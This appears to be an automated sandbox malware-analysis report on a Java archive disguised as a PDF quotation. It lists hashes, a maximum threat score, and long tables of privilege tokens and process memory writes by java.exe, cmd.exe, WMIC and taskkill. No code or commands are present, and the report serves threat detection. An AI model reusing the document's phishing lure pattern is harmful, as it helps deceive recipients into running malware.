c588edfabfe42bc8f6aacfcaac5e28df2b72c354eeebbec732fe361676527ab0

Analysis

max time kernel
146s
max time network
133s
platform
windows10_x64
resource
win10v200430
submitted
10/07/2020, 09:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

URGENT QUOTATION-PDF.jar
Size

403KB
MD5

817352b92f56c7e138392367aafb957c
SHA1

6b22bc04e2ec929b3fbdcbedac0b73f3dc53b6da
SHA256

c588edfabfe42bc8f6aacfcaac5e28df2b72c354eeebbec732fe361676527ab0
SHA512

ba4488fedaa5573774096eaebbd8aa2a80bafb5360c28d4224ecd89db0d81ed58f87c9695d5c0b02b299bcba53056c7f17b5337ca9fdf3e62fdff65a01a36b44

Score

10^/10

persistence evasion trojan discovery

Malware Config

Signatures

Suspicious use of AdjustPrivilegeToken 164 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2120	WMIC.exe
Token: SeSecurityPrivilege	2120	WMIC.exe
Token: SeTakeOwnershipPrivilege	2120	WMIC.exe
Token: SeLoadDriverPrivilege	2120	WMIC.exe
Token: SeSystemProfilePrivilege	2120	WMIC.exe
Token: SeSystemtimePrivilege	2120	WMIC.exe
Token: SeProfSingleProcessPrivilege	2120	WMIC.exe
Token: SeIncBasePriorityPrivilege	2120	WMIC.exe
Token: SeCreatePagefilePrivilege	2120	WMIC.exe
Token: SeBackupPrivilege	2120	WMIC.exe
Token: SeRestorePrivilege	2120	WMIC.exe
Token: SeShutdownPrivilege	2120	WMIC.exe
Token: SeDebugPrivilege	2120	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2120	WMIC.exe
Token: SeRemoteShutdownPrivilege	2120	WMIC.exe
Token: SeUndockPrivilege	2120	WMIC.exe
Token: SeManageVolumePrivilege	2120	WMIC.exe
Token: 33	2120	WMIC.exe
Token: 34	2120	WMIC.exe
Token: 35	2120	WMIC.exe
Token: 36	2120	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2120	WMIC.exe
Token: SeSecurityPrivilege	2120	WMIC.exe
Token: SeTakeOwnershipPrivilege	2120	WMIC.exe
Token: SeLoadDriverPrivilege	2120	WMIC.exe
Token: SeSystemProfilePrivilege	2120	WMIC.exe
Token: SeSystemtimePrivilege	2120	WMIC.exe
Token: SeProfSingleProcessPrivilege	2120	WMIC.exe
Token: SeIncBasePriorityPrivilege	2120	WMIC.exe
Token: SeCreatePagefilePrivilege	2120	WMIC.exe
Token: SeBackupPrivilege	2120	WMIC.exe
Token: SeRestorePrivilege	2120	WMIC.exe
Token: SeShutdownPrivilege	2120	WMIC.exe
Token: SeDebugPrivilege	2120	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2120	WMIC.exe
Token: SeRemoteShutdownPrivilege	2120	WMIC.exe
Token: SeUndockPrivilege	2120	WMIC.exe
Token: SeManageVolumePrivilege	2120	WMIC.exe
Token: 33	2120	WMIC.exe
Token: 34	2120	WMIC.exe
Token: 35	2120	WMIC.exe
Token: 36	2120	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2796	WMIC.exe
Token: SeSecurityPrivilege	2796	WMIC.exe
Token: SeTakeOwnershipPrivilege	2796	WMIC.exe
Token: SeLoadDriverPrivilege	2796	WMIC.exe
Token: SeSystemProfilePrivilege	2796	WMIC.exe
Token: SeSystemtimePrivilege	2796	WMIC.exe
Token: SeProfSingleProcessPrivilege	2796	WMIC.exe
Token: SeIncBasePriorityPrivilege	2796	WMIC.exe
Token: SeCreatePagefilePrivilege	2796	WMIC.exe
Token: SeBackupPrivilege	2796	WMIC.exe
Token: SeRestorePrivilege	2796	WMIC.exe
Token: SeShutdownPrivilege	2796	WMIC.exe
Token: SeDebugPrivilege	2796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2796	WMIC.exe
Token: SeRemoteShutdownPrivilege	2796	WMIC.exe
Token: SeUndockPrivilege	2796	WMIC.exe
Token: SeManageVolumePrivilege	2796	WMIC.exe
Token: 33	2796	WMIC.exe
Token: 34	2796	WMIC.exe
Token: 35	2796	WMIC.exe
Token: 36	2796	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2796	WMIC.exe
Token: SeSecurityPrivilege	2796	WMIC.exe
Token: SeTakeOwnershipPrivilege	2796	WMIC.exe
Token: SeLoadDriverPrivilege	2796	WMIC.exe
Token: SeSystemProfilePrivilege	2796	WMIC.exe
Token: SeSystemtimePrivilege	2796	WMIC.exe
Token: SeProfSingleProcessPrivilege	2796	WMIC.exe
Token: SeIncBasePriorityPrivilege	2796	WMIC.exe
Token: SeCreatePagefilePrivilege	2796	WMIC.exe
Token: SeBackupPrivilege	2796	WMIC.exe
Token: SeRestorePrivilege	2796	WMIC.exe
Token: SeShutdownPrivilege	2796	WMIC.exe
Token: SeDebugPrivilege	2796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2796	WMIC.exe
Token: SeRemoteShutdownPrivilege	2796	WMIC.exe
Token: SeUndockPrivilege	2796	WMIC.exe
Token: SeManageVolumePrivilege	2796	WMIC.exe
Token: 33	2796	WMIC.exe
Token: 34	2796	WMIC.exe
Token: 35	2796	WMIC.exe
Token: 36	2796	WMIC.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeDebugPrivilege	1108	taskkill.exe
Token: SeDebugPrivilege	3800	taskkill.exe
Token: SeDebugPrivilege	3912	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1144	powershell.exe
Token: SeSecurityPrivilege	1144	powershell.exe
Token: SeTakeOwnershipPrivilege	1144	powershell.exe
Token: SeLoadDriverPrivilege	1144	powershell.exe
Token: SeSystemProfilePrivilege	1144	powershell.exe
Token: SeSystemtimePrivilege	1144	powershell.exe
Token: SeProfSingleProcessPrivilege	1144	powershell.exe
Token: SeIncBasePriorityPrivilege	1144	powershell.exe
Token: SeCreatePagefilePrivilege	1144	powershell.exe
Token: SeBackupPrivilege	1144	powershell.exe
Token: SeRestorePrivilege	1144	powershell.exe
Token: SeShutdownPrivilege	1144	powershell.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeSystemEnvironmentPrivilege	1144	powershell.exe
Token: SeRemoteShutdownPrivilege	1144	powershell.exe
Token: SeUndockPrivilege	1144	powershell.exe
Token: SeManageVolumePrivilege	1144	powershell.exe
Token: 33	1144	powershell.exe
Token: 34	1144	powershell.exe
Token: 35	1144	powershell.exe
Token: 36	1144	powershell.exe
Token: SeDebugPrivilege	3724	taskkill.exe
Token: SeDebugPrivilege	4272	taskkill.exe
Token: SeDebugPrivilege	4736	taskkill.exe
Token: SeDebugPrivilege	4372	taskkill.exe
Token: SeDebugPrivilege	5068	taskkill.exe
Token: SeDebugPrivilege	4604	taskkill.exe
Token: SeDebugPrivilege	4980	taskkill.exe
Token: SeDebugPrivilege	3840	taskkill.exe
Token: SeDebugPrivilege	4444	taskkill.exe
Token: SeDebugPrivilege	5152	taskkill.exe
Token: SeDebugPrivilege	5212	taskkill.exe
Token: SeDebugPrivilege	5308	taskkill.exe
Token: SeDebugPrivilege	5368	taskkill.exe
Token: SeIncreaseQuotaPrivilege	5600	WMIC.exe
Token: SeSecurityPrivilege	5600	WMIC.exe
Token: SeTakeOwnershipPrivilege	5600	WMIC.exe
Token: SeLoadDriverPrivilege	5600	WMIC.exe
Token: SeSystemProfilePrivilege	5600	WMIC.exe
Token: SeSystemtimePrivilege	5600	WMIC.exe
Token: SeProfSingleProcessPrivilege	5600	WMIC.exe
Token: SeIncBasePriorityPrivilege	5600	WMIC.exe
Token: SeCreatePagefilePrivilege	5600	WMIC.exe
Token: SeBackupPrivilege	5600	WMIC.exe
Token: SeRestorePrivilege	5600	WMIC.exe
Token: SeShutdownPrivilege	5600	WMIC.exe
Token: SeDebugPrivilege	5600	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5600	WMIC.exe
Token: SeRemoteShutdownPrivilege	5600	WMIC.exe
Token: SeUndockPrivilege	5600	WMIC.exe
Token: SeManageVolumePrivilege	5600	WMIC.exe
Token: 33	5600	WMIC.exe
Token: 34	5600	WMIC.exe
Token: 35	5600	WMIC.exe
Token: 36	5600	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5600	WMIC.exe
Token: SeSecurityPrivilege	5600	WMIC.exe
Token: SeTakeOwnershipPrivilege	5600	WMIC.exe
Token: SeLoadDriverPrivilege	5600	WMIC.exe
Token: SeSystemProfilePrivilege	5600	WMIC.exe
Token: SeSystemtimePrivilege	5600	WMIC.exe
Token: SeProfSingleProcessPrivilege	5600	WMIC.exe
Token: SeIncBasePriorityPrivilege	5600	WMIC.exe
Token: SeCreatePagefilePrivilege	5600	WMIC.exe
Token: SeBackupPrivilege	5600	WMIC.exe
Token: SeRestorePrivilege	5600	WMIC.exe
Token: SeShutdownPrivilege	5600	WMIC.exe
Token: SeDebugPrivilege	5600	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5600	WMIC.exe
Token: SeRemoteShutdownPrivilege	5600	WMIC.exe
Token: SeUndockPrivilege	5600	WMIC.exe
Token: SeManageVolumePrivilege	5600	WMIC.exe
Token: 33	5600	WMIC.exe
Token: 34	5600	WMIC.exe
Token: 35	5600	WMIC.exe
Token: 36	5600	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
428	java.exe

Suspicious use of WriteProcessMemory 390 IoCs

description	pid	Process	procid_target
PID 428 wrote to memory of 1780	428	java.exe	67
PID 428 wrote to memory of 1780	428	java.exe	67
PID 428 wrote to memory of 1968	428	java.exe	69
PID 428 wrote to memory of 1968	428	java.exe	69
PID 1968 wrote to memory of 2120	1968	cmd.exe	71
PID 1968 wrote to memory of 2120	1968	cmd.exe	71
PID 428 wrote to memory of 2508	428	java.exe	72
PID 428 wrote to memory of 2508	428	java.exe	72
PID 2508 wrote to memory of 2796	2508	cmd.exe	74
PID 2508 wrote to memory of 2796	2508	cmd.exe	74
PID 428 wrote to memory of 3832	428	java.exe	75
PID 428 wrote to memory of 3832	428	java.exe	75
PID 428 wrote to memory of 3880	428	java.exe	77
PID 428 wrote to memory of 3880	428	java.exe	77
PID 428 wrote to memory of 3152	428	java.exe	79
PID 428 wrote to memory of 3152	428	java.exe	79
PID 428 wrote to memory of 3960	428	java.exe	80
PID 428 wrote to memory of 3960	428	java.exe	80
PID 428 wrote to memory of 3432	428	java.exe	82
PID 428 wrote to memory of 3432	428	java.exe	82
PID 428 wrote to memory of 3428	428	java.exe	84
PID 428 wrote to memory of 3428	428	java.exe	84
PID 428 wrote to memory of 1796	428	java.exe	86
PID 428 wrote to memory of 1796	428	java.exe	86
PID 428 wrote to memory of 3660	428	java.exe	88
PID 428 wrote to memory of 3660	428	java.exe	88
PID 428 wrote to memory of 3572	428	java.exe	91
PID 428 wrote to memory of 3572	428	java.exe	91
PID 428 wrote to memory of 1108	428	java.exe	93
PID 428 wrote to memory of 1108	428	java.exe	93
PID 428 wrote to memory of 1144	428	java.exe	94
PID 428 wrote to memory of 1144	428	java.exe	94
PID 428 wrote to memory of 1232	428	java.exe	95
PID 428 wrote to memory of 1232	428	java.exe	95
PID 428 wrote to memory of 1288	428	java.exe	96
PID 428 wrote to memory of 1288	428	java.exe	96
PID 3572 wrote to memory of 1564	3572	cmd.exe	101
PID 3572 wrote to memory of 1564	3572	cmd.exe	101
PID 428 wrote to memory of 2152	428	java.exe	102
PID 428 wrote to memory of 2152	428	java.exe	102
PID 428 wrote to memory of 2120	428	java.exe	103
PID 428 wrote to memory of 2120	428	java.exe	103
PID 428 wrote to memory of 3836	428	java.exe	105
PID 428 wrote to memory of 3836	428	java.exe	105
PID 428 wrote to memory of 4088	428	java.exe	107
PID 428 wrote to memory of 4088	428	java.exe	107
PID 428 wrote to memory of 3640	428	java.exe	110
PID 428 wrote to memory of 3640	428	java.exe	110
PID 428 wrote to memory of 4012	428	java.exe	111
PID 428 wrote to memory of 4012	428	java.exe	111
PID 428 wrote to memory of 2744	428	java.exe	114
PID 428 wrote to memory of 2744	428	java.exe	114
PID 428 wrote to memory of 8	428	java.exe	115
PID 428 wrote to memory of 8	428	java.exe	115
PID 428 wrote to memory of 1052	428	java.exe	118
PID 428 wrote to memory of 1052	428	java.exe	118
PID 428 wrote to memory of 1460	428	java.exe	119
PID 428 wrote to memory of 1460	428	java.exe	119
PID 3572 wrote to memory of 1788	3572	cmd.exe	122
PID 3572 wrote to memory of 1788	3572	cmd.exe	122
PID 428 wrote to memory of 2960	428	java.exe	123
PID 428 wrote to memory of 2960	428	java.exe	123
PID 428 wrote to memory of 3992	428	java.exe	125
PID 428 wrote to memory of 3992	428	java.exe	125
PID 428 wrote to memory of 3800	428	java.exe	127
PID 428 wrote to memory of 3800	428	java.exe	127
PID 428 wrote to memory of 3836	428	java.exe	129
PID 428 wrote to memory of 3836	428	java.exe	129
PID 428 wrote to memory of 2184	428	java.exe	132
PID 428 wrote to memory of 2184	428	java.exe	132
PID 428 wrote to memory of 3920	428	java.exe	134
PID 428 wrote to memory of 3920	428	java.exe	134
PID 428 wrote to memory of 3420	428	java.exe	135
PID 428 wrote to memory of 3420	428	java.exe	135
PID 428 wrote to memory of 3912	428	java.exe	138
PID 428 wrote to memory of 3912	428	java.exe	138
PID 428 wrote to memory of 2692	428	java.exe	140
PID 428 wrote to memory of 2692	428	java.exe	140
PID 428 wrote to memory of 3000	428	java.exe	142
PID 428 wrote to memory of 3000	428	java.exe	142
PID 3420 wrote to memory of 3824	3420	cmd.exe	144
PID 3420 wrote to memory of 3824	3420	cmd.exe	144
PID 428 wrote to memory of 2892	428	java.exe	145
PID 428 wrote to memory of 2892	428	java.exe	145
PID 428 wrote to memory of 2752	428	java.exe	147
PID 428 wrote to memory of 2752	428	java.exe	147
PID 3420 wrote to memory of 2352	3420	cmd.exe	149
PID 3420 wrote to memory of 2352	3420	cmd.exe	149
PID 428 wrote to memory of 2536	428	java.exe	150
PID 428 wrote to memory of 2536	428	java.exe	150
PID 428 wrote to memory of 3912	428	java.exe	152
PID 428 wrote to memory of 3912	428	java.exe	152
PID 2536 wrote to memory of 3992	2536	cmd.exe	154
PID 2536 wrote to memory of 3992	2536	cmd.exe	154
PID 2536 wrote to memory of 3844	2536	cmd.exe	155
PID 2536 wrote to memory of 3844	2536	cmd.exe	155
PID 428 wrote to memory of 2692	428	java.exe	156
PID 428 wrote to memory of 2692	428	java.exe	156
PID 2692 wrote to memory of 3036	2692	cmd.exe	158
PID 2692 wrote to memory of 3036	2692	cmd.exe	158
PID 2692 wrote to memory of 2892	2692	cmd.exe	159
PID 2692 wrote to memory of 2892	2692	cmd.exe	159
PID 428 wrote to memory of 2116	428	java.exe	160
PID 428 wrote to memory of 2116	428	java.exe	160
PID 2116 wrote to memory of 2752	2116	cmd.exe	162
PID 2116 wrote to memory of 2752	2116	cmd.exe	162
PID 2116 wrote to memory of 3416	2116	cmd.exe	163
PID 2116 wrote to memory of 3416	2116	cmd.exe	163
PID 428 wrote to memory of 3824	428	java.exe	164
PID 428 wrote to memory of 3824	428	java.exe	164
PID 3824 wrote to memory of 1672	3824	cmd.exe	166
PID 3824 wrote to memory of 1672	3824	cmd.exe	166
PID 3824 wrote to memory of 3392	3824	cmd.exe	167
PID 3824 wrote to memory of 3392	3824	cmd.exe	167
PID 428 wrote to memory of 1552	428	java.exe	168
PID 428 wrote to memory of 1552	428	java.exe	168
PID 1552 wrote to memory of 3908	1552	cmd.exe	170
PID 1552 wrote to memory of 3908	1552	cmd.exe	170
PID 1552 wrote to memory of 3836	1552	cmd.exe	171
PID 1552 wrote to memory of 3836	1552	cmd.exe	171
PID 428 wrote to memory of 1288	428	java.exe	172
PID 428 wrote to memory of 1288	428	java.exe	172
PID 428 wrote to memory of 3724	428	java.exe	174
PID 428 wrote to memory of 3724	428	java.exe	174
PID 1288 wrote to memory of 2912	1288	cmd.exe	176
PID 1288 wrote to memory of 2912	1288	cmd.exe	176
PID 1288 wrote to memory of 1524	1288	cmd.exe	177
PID 1288 wrote to memory of 1524	1288	cmd.exe	177
PID 428 wrote to memory of 1788	428	java.exe	178
PID 428 wrote to memory of 1788	428	java.exe	178
PID 1788 wrote to memory of 1108	1788	cmd.exe	180
PID 1788 wrote to memory of 1108	1788	cmd.exe	180
PID 1788 wrote to memory of 3560	1788	cmd.exe	181
PID 1788 wrote to memory of 3560	1788	cmd.exe	181
PID 428 wrote to memory of 1052	428	java.exe	182
PID 428 wrote to memory of 1052	428	java.exe	182
PID 1052 wrote to memory of 1744	1052	cmd.exe	185
PID 1052 wrote to memory of 1744	1052	cmd.exe	185
PID 1052 wrote to memory of 3992	1052	cmd.exe	186
PID 1052 wrote to memory of 3992	1052	cmd.exe	186
PID 428 wrote to memory of 4028	428	java.exe	187
PID 428 wrote to memory of 4028	428	java.exe	187
PID 4028 wrote to memory of 2164	4028	cmd.exe	189
PID 4028 wrote to memory of 2164	4028	cmd.exe	189
PID 4028 wrote to memory of 3844	4028	cmd.exe	190
PID 4028 wrote to memory of 3844	4028	cmd.exe	190
PID 428 wrote to memory of 3392	428	java.exe	191
PID 428 wrote to memory of 3392	428	java.exe	191
PID 3392 wrote to memory of 1760	3392	cmd.exe	193
PID 3392 wrote to memory of 1760	3392	cmd.exe	193
PID 3392 wrote to memory of 1328	3392	cmd.exe	194
PID 3392 wrote to memory of 1328	3392	cmd.exe	194
PID 428 wrote to memory of 3004	428	java.exe	195
PID 428 wrote to memory of 3004	428	java.exe	195
PID 3004 wrote to memory of 3560	3004	cmd.exe	197
PID 3004 wrote to memory of 3560	3004	cmd.exe	197
PID 3004 wrote to memory of 4108	3004	cmd.exe	198
PID 3004 wrote to memory of 4108	3004	cmd.exe	198
PID 428 wrote to memory of 4124	428	java.exe	199
PID 428 wrote to memory of 4124	428	java.exe	199
PID 4124 wrote to memory of 4160	4124	cmd.exe	201
PID 4124 wrote to memory of 4160	4124	cmd.exe	201
PID 4124 wrote to memory of 4180	4124	cmd.exe	202
PID 4124 wrote to memory of 4180	4124	cmd.exe	202
PID 428 wrote to memory of 4200	428	java.exe	203
PID 428 wrote to memory of 4200	428	java.exe	203
PID 4200 wrote to memory of 4236	4200	cmd.exe	205
PID 4200 wrote to memory of 4236	4200	cmd.exe	205
PID 4200 wrote to memory of 4256	4200	cmd.exe	206
PID 4200 wrote to memory of 4256	4200	cmd.exe	206
PID 428 wrote to memory of 4272	428	java.exe	207
PID 428 wrote to memory of 4272	428	java.exe	207
PID 428 wrote to memory of 4292	428	java.exe	209
PID 428 wrote to memory of 4292	428	java.exe	209
PID 4292 wrote to memory of 4356	4292	cmd.exe	211
PID 4292 wrote to memory of 4356	4292	cmd.exe	211
PID 4292 wrote to memory of 4388	4292	cmd.exe	212
PID 4292 wrote to memory of 4388	4292	cmd.exe	212
PID 428 wrote to memory of 4408	428	java.exe	213
PID 428 wrote to memory of 4408	428	java.exe	213
PID 4408 wrote to memory of 4444	4408	cmd.exe	215
PID 4408 wrote to memory of 4444	4408	cmd.exe	215
PID 4408 wrote to memory of 4468	4408	cmd.exe	216
PID 4408 wrote to memory of 4468	4408	cmd.exe	216
PID 428 wrote to memory of 4488	428	java.exe	217
PID 428 wrote to memory of 4488	428	java.exe	217
PID 4488 wrote to memory of 4524	4488	cmd.exe	219
PID 4488 wrote to memory of 4524	4488	cmd.exe	219
PID 4488 wrote to memory of 4544	4488	cmd.exe	220
PID 4488 wrote to memory of 4544	4488	cmd.exe	220
PID 428 wrote to memory of 4564	428	java.exe	221
PID 428 wrote to memory of 4564	428	java.exe	221
PID 4564 wrote to memory of 4600	4564	cmd.exe	223
PID 4564 wrote to memory of 4600	4564	cmd.exe	223
PID 4564 wrote to memory of 4620	4564	cmd.exe	224
PID 4564 wrote to memory of 4620	4564	cmd.exe	224
PID 428 wrote to memory of 4640	428	java.exe	225
PID 428 wrote to memory of 4640	428	java.exe	225
PID 4640 wrote to memory of 4676	4640	cmd.exe	227
PID 4640 wrote to memory of 4676	4640	cmd.exe	227
PID 4640 wrote to memory of 4696	4640	cmd.exe	228
PID 4640 wrote to memory of 4696	4640	cmd.exe	228
PID 428 wrote to memory of 4716	428	java.exe	229
PID 428 wrote to memory of 4716	428	java.exe	229
PID 428 wrote to memory of 4736	428	java.exe	231
PID 428 wrote to memory of 4736	428	java.exe	231
PID 4716 wrote to memory of 4784	4716	cmd.exe	233
PID 4716 wrote to memory of 4784	4716	cmd.exe	233
PID 4716 wrote to memory of 4812	4716	cmd.exe	234
PID 4716 wrote to memory of 4812	4716	cmd.exe	234
PID 428 wrote to memory of 4836	428	java.exe	235
PID 428 wrote to memory of 4836	428	java.exe	235
PID 4836 wrote to memory of 4884	4836	cmd.exe	237
PID 4836 wrote to memory of 4884	4836	cmd.exe	237
PID 4836 wrote to memory of 4904	4836	cmd.exe	238
PID 4836 wrote to memory of 4904	4836	cmd.exe	238
PID 428 wrote to memory of 4924	428	java.exe	239
PID 428 wrote to memory of 4924	428	java.exe	239
PID 4924 wrote to memory of 4960	4924	cmd.exe	241
PID 4924 wrote to memory of 4960	4924	cmd.exe	241
PID 4924 wrote to memory of 4980	4924	cmd.exe	242
PID 4924 wrote to memory of 4980	4924	cmd.exe	242
PID 428 wrote to memory of 5000	428	java.exe	243
PID 428 wrote to memory of 5000	428	java.exe	243
PID 5000 wrote to memory of 5036	5000	cmd.exe	245
PID 5000 wrote to memory of 5036	5000	cmd.exe	245
PID 5000 wrote to memory of 5056	5000	cmd.exe	246
PID 5000 wrote to memory of 5056	5000	cmd.exe	246
PID 428 wrote to memory of 5076	428	java.exe	247
PID 428 wrote to memory of 5076	428	java.exe	247
PID 5076 wrote to memory of 5112	5076	cmd.exe	249
PID 5076 wrote to memory of 5112	5076	cmd.exe	249
PID 5076 wrote to memory of 2724	5076	cmd.exe	250
PID 5076 wrote to memory of 2724	5076	cmd.exe	250
PID 428 wrote to memory of 4112	428	java.exe	251
PID 428 wrote to memory of 4112	428	java.exe	251
PID 4112 wrote to memory of 4120	4112	cmd.exe	253
PID 4112 wrote to memory of 4120	4112	cmd.exe	253
PID 4112 wrote to memory of 2544	4112	cmd.exe	254
PID 4112 wrote to memory of 2544	4112	cmd.exe	254
PID 428 wrote to memory of 1544	428	java.exe	255
PID 428 wrote to memory of 1544	428	java.exe	255
PID 1544 wrote to memory of 1332	1544	cmd.exe	257
PID 1544 wrote to memory of 1332	1544	cmd.exe	257
PID 1544 wrote to memory of 4172	1544	cmd.exe	258
PID 1544 wrote to memory of 4172	1544	cmd.exe	258
PID 428 wrote to memory of 4184	428	java.exe	259
PID 428 wrote to memory of 4184	428	java.exe	259
PID 4184 wrote to memory of 4248	4184	cmd.exe	261
PID 4184 wrote to memory of 4248	4184	cmd.exe	261
PID 4184 wrote to memory of 4256	4184	cmd.exe	262
PID 4184 wrote to memory of 4256	4184	cmd.exe	262
PID 428 wrote to memory of 4320	428	java.exe	263
PID 428 wrote to memory of 4320	428	java.exe	263
PID 428 wrote to memory of 4372	428	java.exe	264
PID 428 wrote to memory of 4372	428	java.exe	264
PID 4320 wrote to memory of 4352	4320	cmd.exe	267
PID 4320 wrote to memory of 4352	4320	cmd.exe	267
PID 4320 wrote to memory of 4312	4320	cmd.exe	268
PID 4320 wrote to memory of 4312	4320	cmd.exe	268
PID 428 wrote to memory of 4484	428	java.exe	269
PID 428 wrote to memory of 4484	428	java.exe	269
PID 4484 wrote to memory of 4552	4484	cmd.exe	271
PID 4484 wrote to memory of 4552	4484	cmd.exe	271
PID 4484 wrote to memory of 4544	4484	cmd.exe	272
PID 4484 wrote to memory of 4544	4484	cmd.exe	272
PID 428 wrote to memory of 4616	428	java.exe	273
PID 428 wrote to memory of 4616	428	java.exe	273
PID 4616 wrote to memory of 4656	4616	cmd.exe	275
PID 4616 wrote to memory of 4656	4616	cmd.exe	275
PID 4616 wrote to memory of 4704	4616	cmd.exe	276
PID 4616 wrote to memory of 4704	4616	cmd.exe	276
PID 428 wrote to memory of 4696	428	java.exe	277
PID 428 wrote to memory of 4696	428	java.exe	277
PID 4696 wrote to memory of 4784	4696	cmd.exe	279
PID 4696 wrote to memory of 4784	4696	cmd.exe	279
PID 4696 wrote to memory of 4844	4696	cmd.exe	280
PID 4696 wrote to memory of 4844	4696	cmd.exe	280
PID 428 wrote to memory of 4900	428	java.exe	281
PID 428 wrote to memory of 4900	428	java.exe	281
PID 4900 wrote to memory of 4772	4900	cmd.exe	283
PID 4900 wrote to memory of 4772	4900	cmd.exe	283
PID 4900 wrote to memory of 4884	4900	cmd.exe	284
PID 4900 wrote to memory of 4884	4900	cmd.exe	284
PID 428 wrote to memory of 4932	428	java.exe	285
PID 428 wrote to memory of 4932	428	java.exe	285
PID 4932 wrote to memory of 4996	4932	cmd.exe	287
PID 4932 wrote to memory of 4996	4932	cmd.exe	287
PID 4932 wrote to memory of 5044	4932	cmd.exe	288
PID 4932 wrote to memory of 5044	4932	cmd.exe	288
PID 428 wrote to memory of 5036	428	java.exe	289
PID 428 wrote to memory of 5036	428	java.exe	289
PID 428 wrote to memory of 5068	428	java.exe	290
PID 428 wrote to memory of 5068	428	java.exe	290
PID 5036 wrote to memory of 1536	5036	cmd.exe	293
PID 5036 wrote to memory of 1536	5036	cmd.exe	293
PID 5036 wrote to memory of 4120	5036	cmd.exe	294
PID 5036 wrote to memory of 4120	5036	cmd.exe	294
PID 428 wrote to memory of 4168	428	java.exe	295
PID 428 wrote to memory of 4168	428	java.exe	295
PID 4168 wrote to memory of 4236	4168	cmd.exe	297
PID 4168 wrote to memory of 4236	4168	cmd.exe	297
PID 4168 wrote to memory of 4280	4168	cmd.exe	298
PID 4168 wrote to memory of 4280	4168	cmd.exe	298
PID 428 wrote to memory of 4356	428	java.exe	299
PID 428 wrote to memory of 4356	428	java.exe	299
PID 4356 wrote to memory of 4284	4356	cmd.exe	301
PID 4356 wrote to memory of 4284	4356	cmd.exe	301
PID 4356 wrote to memory of 4472	4356	cmd.exe	302
PID 4356 wrote to memory of 4472	4356	cmd.exe	302
PID 428 wrote to memory of 4376	428	java.exe	303
PID 428 wrote to memory of 4376	428	java.exe	303
PID 4376 wrote to memory of 4556	4376	cmd.exe	305
PID 4376 wrote to memory of 4556	4376	cmd.exe	305
PID 4376 wrote to memory of 4604	4376	cmd.exe	306
PID 4376 wrote to memory of 4604	4376	cmd.exe	306
PID 428 wrote to memory of 4680	428	java.exe	307
PID 428 wrote to memory of 4680	428	java.exe	307
PID 4680 wrote to memory of 4704	4680	cmd.exe	309
PID 4680 wrote to memory of 4704	4680	cmd.exe	309
PID 4680 wrote to memory of 4784	4680	cmd.exe	310
PID 4680 wrote to memory of 4784	4680	cmd.exe	310
PID 428 wrote to memory of 4892	428	java.exe	311
PID 428 wrote to memory of 4892	428	java.exe	311
PID 4892 wrote to memory of 4772	4892	cmd.exe	313
PID 4892 wrote to memory of 4772	4892	cmd.exe	313
PID 4892 wrote to memory of 4884	4892	cmd.exe	314
PID 4892 wrote to memory of 4884	4892	cmd.exe	314
PID 428 wrote to memory of 5008	428	java.exe	315
PID 428 wrote to memory of 5008	428	java.exe	315
PID 5008 wrote to memory of 2164	5008	cmd.exe	317
PID 5008 wrote to memory of 2164	5008	cmd.exe	317
PID 5008 wrote to memory of 4108	5008	cmd.exe	318
PID 5008 wrote to memory of 4108	5008	cmd.exe	318
PID 428 wrote to memory of 2544	428	java.exe	319
PID 428 wrote to memory of 2544	428	java.exe	319
PID 2544 wrote to memory of 4132	2544	cmd.exe	321
PID 2544 wrote to memory of 4132	2544	cmd.exe	321
PID 2544 wrote to memory of 2160	2544	cmd.exe	322
PID 2544 wrote to memory of 2160	2544	cmd.exe	322
PID 428 wrote to memory of 2140	428	java.exe	323
PID 428 wrote to memory of 2140	428	java.exe	323
PID 2140 wrote to memory of 4468	2140	cmd.exe	325
PID 2140 wrote to memory of 4468	2140	cmd.exe	325
PID 2140 wrote to memory of 4284	2140	cmd.exe	326
PID 2140 wrote to memory of 4284	2140	cmd.exe	326
PID 428 wrote to memory of 4368	428	java.exe	327
PID 428 wrote to memory of 4368	428	java.exe	327
PID 4368 wrote to memory of 4624	4368	cmd.exe	329
PID 4368 wrote to memory of 4624	4368	cmd.exe	329
PID 4368 wrote to memory of 4764	4368	cmd.exe	330
PID 4368 wrote to memory of 4764	4368	cmd.exe	330
PID 428 wrote to memory of 4704	428	java.exe	331
PID 428 wrote to memory of 4704	428	java.exe	331
PID 4704 wrote to memory of 4968	4704	cmd.exe	333
PID 4704 wrote to memory of 4968	4704	cmd.exe	333
PID 4704 wrote to memory of 2232	4704	cmd.exe	334
PID 4704 wrote to memory of 2232	4704	cmd.exe	334
PID 428 wrote to memory of 4996	428	java.exe	335
PID 428 wrote to memory of 4996	428	java.exe	335
PID 4996 wrote to memory of 4116	4996	cmd.exe	337
PID 4996 wrote to memory of 4116	4996	cmd.exe	337
PID 4996 wrote to memory of 5056	4996	cmd.exe	338
PID 4996 wrote to memory of 5056	4996	cmd.exe	338
PID 428 wrote to memory of 4132	428	java.exe	339
PID 428 wrote to memory of 4132	428	java.exe	339
PID 4132 wrote to memory of 4460	4132	cmd.exe	341
PID 4132 wrote to memory of 4460	4132	cmd.exe	341
PID 4132 wrote to memory of 4472	4132	cmd.exe	342
PID 4132 wrote to memory of 4472	4132	cmd.exe	342
PID 428 wrote to memory of 4604	428	java.exe	343
PID 428 wrote to memory of 4604	428	java.exe	343
PID 428 wrote to memory of 4980	428	java.exe	345
PID 428 wrote to memory of 4980	428	java.exe	345
PID 428 wrote to memory of 3840	428	java.exe	347
PID 428 wrote to memory of 3840	428	java.exe	347
PID 428 wrote to memory of 4444	428	java.exe	351
PID 428 wrote to memory of 4444	428	java.exe	351
PID 428 wrote to memory of 5152	428	java.exe	353
PID 428 wrote to memory of 5152	428	java.exe	353
PID 428 wrote to memory of 5212	428	java.exe	355
